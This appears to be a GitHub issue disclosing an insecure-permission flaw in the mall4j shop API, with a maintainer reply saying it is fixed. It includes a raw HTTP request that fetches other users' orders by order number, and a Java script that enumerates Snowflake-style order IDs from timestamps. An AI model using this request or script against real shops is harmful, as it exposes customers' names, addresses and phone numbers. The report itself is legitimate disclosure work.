There is a insecure permission vulnerability that can lead to information Disclosure
swee520 opened this issue · 1 comments
After the user logged in, send the following data:
GET /p/order/getOrderPayInfoByOrderNumber?orderNumbers=1585796527123730432 HTTP/2 Host: b2b2c-api.mall4j.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: application/json, text/plain, */* Accept-Language: zh Accept-Encoding: gzip, deflate Authorization: iqype7HZzm8WwlUnYTIRmXVBsfZ2Udqs+7wO+RAQLOB61CG1vjV6U+sArYkZPG8Q Origin: https://pc.mall4j.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers Connection: close
The user can input others orderNumbers to gain other Privacy Information including address,name,phonenumber and so on.
I write a script can get orderNumbers,attacker can get order's information that was created in any day.
Script:
`
import cn.hutool.core.date.SystemClock;
import cn.hutool.core.util.IdUtil;
import cn.hutool.core.util.StrUtil;
import java.io.*;
import java.util.Date;
public class test implements Serializable {
public static void main(String[] args) throws IOException {
FileWriter f = new FileWriter("/mall4j-master/1.txt");
FileOutputStream out = null;
for (long i = 1666884749000l; i <= 1666884750000l; i++) {
for (long j = 31l; j <= 31l; j++) {
test test1 = new test(1,1);
// out = new FileOutputStream(new File("/Users/zhangchenxu/安全/代码审计靶场/mall4j-master/1.txt"));
String str = String.valueOf(test1.nextId(i));
System.out.println(str);
f.write(str + "\n");
}
}
// System.out.println(test1.nextId(1666885538000l));
f.close();
}
private static final long serialVersionUID = 1L;
public static long DEFAULT_TWEPOCH = 1288834974657L;
public static long DEFAULT_TIME_OFFSET = 2000L;
private static final long WORKER_ID_BITS = 5L;
private static final long MAX_WORKER_ID = -1L ^ (-1L << WORKER_ID_BITS);
private static final long DATA_CENTER_ID_BITS = 5L;
private static final long MAX_DATA_CENTER_ID = -1L ^ (-1L << DATA_CENTER_ID_BITS);
private static final long SEQUENCE_BITS = 12L;
private static final long WORKER_ID_SHIFT = SEQUENCE_BITS;
private static final long DATA_CENTER_ID_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS;
private static final long TIMESTAMP_LEFT_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS + DATA_CENTER_ID_BITS;
private static final long SEQUENCE_MASK = ~(-1L << SEQUENCE_BITS);// 4095
private long twepoch;
private long workerId;
private long dataCenterId;
private boolean useSystemClock;
private long timeOffset;
private long sequence = 0L;
private long lastTimestamp = -1L;
public test() {
this(IdUtil.getWorkerId(IdUtil.getDataCenterId(MAX_DATA_CENTER_ID), MAX_WORKER_ID));
}
public test(long workerId) {
this(workerId, IdUtil.getDataCenterId(MAX_DATA_CENTER_ID));
}
public test(long workerId, long dataCenterId) {
this(workerId, dataCenterId, false);
}
public test(long workerId, long dataCenterId, boolean isUseSystemClock) {
this(null, workerId, dataCenterId, isUseSystemClock);
}
public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock) {
this(epochDate, workerId, dataCenterId, isUseSystemClock, DEFAULT_TIME_OFFSET);
}
public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock, long timeOffset) {
if (null != epochDate) {
this.twepoch = epochDate.getTime();
System.out.println("null != epochDate");
} else{
// Thu, 04 Nov 2010 01:42:54 GMT
this.twepoch = DEFAULT_TWEPOCH;
}
if (workerId > MAX_WORKER_ID || workerId < 0) {
throw new IllegalArgumentException(StrUtil.format("worker Id can't be greater than {} or less than 0", MAX_WORKER_ID));
}
if (dataCenterId > MAX_DATA_CENTER_ID || dataCenterId < 0) {
throw new IllegalArgumentException(StrUtil.format("datacenter Id can't be greater than {} or less than 0", MAX_DATA_CENTER_ID));
}
this.workerId = workerId;
this.dataCenterId = dataCenterId;
this.useSystemClock = isUseSystemClock;
this.timeOffset = timeOffset;
}
public long getWorkerId(long id) {
return id >> WORKER_ID_SHIFT & ~(-1L << WORKER_ID_BITS);
}
public long getDataCenterId(long id) {
return id >> DATA_CENTER_ID_SHIFT & ~(-1L << DATA_CENTER_ID_BITS);
}
public long getGenerateDateTime(long id) {
return (id >> TIMESTAMP_LEFT_SHIFT & ~(-1L << 41L)) + twepoch;
}
public synchronized long nextId(long time0) {
long timestamp = time0;
if (timestamp < this.lastTimestamp) {
if(this.lastTimestamp - timestamp < timeOffset){
// 容忍指定的回拨,避免NTP校时造成的异常
timestamp = lastTimestamp;
} else{
// 如果服务器时间有问题(时钟后退) 报错。
throw new IllegalStateException(StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
}
}
if (timestamp == this.lastTimestamp) {
final long sequence = (this.sequence + 1) & SEQUENCE_MASK;
if (sequence == 0) {
timestamp = tilNextMillis(lastTimestamp,time0);
}
this.sequence = sequence;
} else {
sequence = 0L;
}
lastTimestamp = timestamp;
long result = ((timestamp - twepoch) << TIMESTAMP_LEFT_SHIFT)
| (dataCenterId << DATA_CENTER_ID_SHIFT)
| (workerId << WORKER_ID_SHIFT)
| sequence;
return result;
}
public String nextIdStr() {
// return Long.toString(nextId());
return null;
}
// ------------------------------------------------------------------------------------------------------------------------------------ Private method start
private long tilNextMillis(long lastTimestamp,long time0) {
long timestamp = time0;
while (timestamp == lastTimestamp) {
timestamp = time0;
}
if (timestamp < lastTimestamp) {
// 如果发现新的时间戳比上次记录的时间戳数值小,说明操作系统时间发生了倒退,报错
throw new IllegalStateException(
StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
}
return timestamp;
}
private long genTime() {
return this.useSystemClock ? SystemClock.now() : System.currentTimeMillis();
}
// ------------------------------------------------------------------------------------------------------------------------------------ Private method end
}
`
Thank you for your report. We have fixed this problem